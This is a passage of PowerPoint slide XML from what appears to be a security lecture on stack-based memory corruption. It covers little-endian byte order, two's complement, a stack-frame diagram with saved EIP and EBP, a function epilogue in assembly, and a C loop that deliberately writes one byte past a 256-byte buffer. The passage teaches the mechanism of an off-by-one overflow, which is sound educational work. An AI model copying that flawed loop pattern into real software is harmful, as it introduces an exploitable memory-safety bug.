          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151350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4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292" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Beware of the Endianess </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(and of Signed Integers)!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1036293" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intel uses little endian ordering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x03020100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> starting at address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00F67B40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00F67B40   00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B41   01     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B42   02     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x00F67B43   03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signed integers are expressed in 2’s complement notation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The sign is changed by flipping the bits and adding one, ignoring the overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-1 is 0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-2 is 0xFFFFFFFE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?? is 0xFFFFF826</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Having a calculator handy is a good thing...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176167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62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62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629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629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629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629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629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3629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3629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3629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3629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3629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65" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1116166" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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Buffer[255]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116167" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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Buffer[254]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116168" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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Buffer[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116169" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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Int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1116171" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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16172" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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16173" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116174" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116175" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116176" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116177" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116178" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116179" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116180" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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16181" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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16182" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116183" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116184" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1116185" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1116179" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2590800" y="4931599"/>
            <a:ext cx="3886200" cy="811976"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1116186" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1116178" idx="1"/>
            <a:endCxn id="1116175" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1343025"/>
            <a:ext cx="1588" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70100005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1116187" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1116177" idx="1"/>
            <a:endCxn id="1116174" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2257425"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -38600005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116188" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116189" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2686050"/>
            <a:ext cx="2057400" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="64000"/>
            </a:schemeClr>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6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="286882" y="2105300"/>
            <a:ext cx="3326552" cy="2086725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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for(</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 0;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&lt;= 256;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buffer[</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202210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61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6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8213" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1118214" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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Buffer[255]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118215" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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Buffer[254]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118216" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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Buffer[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118217" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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Int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1118219" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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18220" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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18221" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
